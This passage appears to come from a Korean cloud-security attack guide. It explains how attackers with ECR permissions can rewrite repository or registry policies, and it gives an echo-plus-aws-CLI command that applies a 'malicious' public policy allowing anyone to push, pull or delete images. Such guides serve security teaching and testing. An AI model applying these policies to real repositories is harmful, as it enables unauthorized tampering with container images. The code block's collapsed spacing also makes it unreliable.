{"Version":"2008-10-17","Statement": [{"Sid":"allow public pull","Effect":"Allow","Principal":"*","Action": ["ecr:BatchCheckLayerAvailability","ecr:BatchGetImage","ecr:GetDownloadUrlForLayer"]}]}
ecr-public:SetRepositoryPolicy
이전 섹션과 마찬가지로, 공개 저장소에 대한 것입니다.
공격자는 ECR Public 저장소의 저장소 정책을 수정하여 무단으로 공개 액세스를 허용하거나 권한을 상승시킬 수 있습니다.
bashCopycode#CreateaJSONfilewiththemaliciouspublicrepositorypolicyecho'{"Version": "2008-10-17","Statement": [{"Sid": "MaliciousPublicRepoPolicy","Effect": "Allow","Principal": "*","Action": ["ecr-public:GetDownloadUrlForLayer","ecr-public:BatchGetImage","ecr-public:BatchCheckLayerAvailability","ecr-public:PutImage","ecr-public:InitiateLayerUpload","ecr-public:UploadLayerPart","ecr-public:CompleteLayerUpload","ecr-public:DeleteRepositoryPolicy"]}]}'>malicious_public_repo_policy.json# Apply the malicious public repository policy to the ECR Public repositoryaws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json
잠재적인 영향: ECR Public 저장소에 대한 무단 공개 액세스로 인해 사용자가 이미지를 푸시, 풀 또는 삭제할 수 있음.
ecr:PutRegistryPolicy
이 권한을 가진 공격자는 레지스트리 정책을 변경하여 자신, 자신의 계정 또는 모든 사용자에게 읽기/쓰기 액세스를 부여할 수 있음.